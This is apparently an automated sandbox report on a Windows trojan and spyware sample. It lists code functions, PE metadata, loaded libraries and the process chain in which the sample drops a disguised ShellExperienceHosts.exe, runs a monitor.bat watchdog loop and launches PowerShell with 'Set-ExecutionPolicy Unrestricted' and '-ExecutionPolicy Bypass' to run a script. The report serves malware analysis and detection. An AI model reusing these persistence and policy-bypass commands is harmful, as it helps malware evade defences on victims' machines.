Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7262CD3_2_6C7262CD
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D9D683_2_6C6D9D68
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C729D8F3_2_6C729D8F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C7E5A3_2_6C6C7E5A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6CBEEC3_2_6C6CBEEC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7F1F413_2_6C7F1F41
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6EB8F83_2_6C6EB8F8
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C723A0E3_2_6C723A0E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D3AF03_2_6C6D3AF0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C73BB743_2_6C73BB74
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C96D23_2_6C6C96D2
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F93CB3_2_6C6F93CB
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_1001122F3_2_1001122F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_100024B03_2_100024B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_1000B66A3_2_1000B66A
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_100117803_2_10011780
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10010CDE3_2_10010CDE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10012D913_2_10012D91
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_10011E5C3_2_10011E5C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022300323_2_02230032
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022412063_2_02241206
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0223B6413_2_0223B641
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022417573_2_02241757
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02240CB53_2_02240CB5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_022324873_2_02232487
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_02242D683_2_02242D68
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BF3BE3_2_031BF3BE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BD25E3_2_031BD25E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A82BF3_2_031A82BF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A689F3_2_031A689F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BD7AF3_2_031BD7AF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A660F3_2_031A660F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031A1E6F3_2_031A1E6F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031BDD003_2_031BDD00
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_031B7D403_2_031B7D40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8106A17_2_02B8106A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8166D17_2_02B8166D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_02B8165317_2_02B81653
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe 41F413DEBFE785B95D852A396AEFE1C814F3C13BDEDF85526F2DC4E83127D6CA
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C7A123B appears 112 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C84CB06 appears 37 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 03334300 appears 32 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C6E1262 appears 69 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C6BC0EA appears 66 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C75B4B6 appears 44 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C6B421A appears 36 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C7A0640 appears 74 times
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: String function: 6C7A11D2 appears 278 times
Source: S1Rv3ioghk.exeStatic PE information: invalid certificate
Source: yyzyBase.dll.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v1.0 to extract, compression method=store
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.drStatic PE information: Resource name: ZIPRES type: Zip archive data, at least v1.0 to extract, compression method=store
Source: backup.dll.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAOKAISB.exe< vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekonlinesetup_xa.exe6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000002.1707325003.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000000.1693064062.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000000.1693064062.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekonlinesetup_xa.exe6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1693975412.00000000024B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1693975412.00000000024B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exeBinary or memory string: OriginalFilenameEasiNote.dll6 vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exeBinary or memory string: OriginalFileNameosprovision.exe` vs S1Rv3ioghk.exe
Source: S1Rv3ioghk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ShellExperienceHosts.exe.0.drStatic PE information: Section: .tp6 ZLIB complexity 1.000637755102041
Source: backup.exe.3.drStatic PE information: Section: .tp6 ZLIB complexity 1.000637755102041
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/28@0/1
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03327B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_03327B70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03327740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_03327740
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03327620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_03327620
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,3_2_03326C50
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_03326050
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,3_2_03326150
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D9953 GetModuleHandleA,SizeofResource,LockResource,FindResourceW,LoadResource,SizeofResource,FindResourceW,LockResource,3_2_6C6D9953
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile created: C:\Users\Public\BuleteJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeMutant created: \Sessions\1\BaseNamedObjects\2024.11.26
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_03
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: S1Rv3ioghk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SHELLEXPERIENCEHOSTS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SHELLEXPERIENCEHOSTS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SHELLEXPERIENCEHOSTS.EXE&apos;
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SHELLEXPERIENCEHOSTS.EXE&apos;
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: S1Rv3ioghk.exeVirustotal: Detection: 66%
Source: S1Rv3ioghk.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeFile read: C:\Users\user\Desktop\S1Rv3ioghk.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\S1Rv3ioghk.exe "C:\Users\user\Desktop\S1Rv3ioghk.exe"
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe C:\Users\Public\Bulete\program\ShellExperienceHosts.exeJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "ShellExperienceHosts.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\S1Rv3ioghk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: yyzybase.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: oledlg.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: dinput8.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: devenum.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
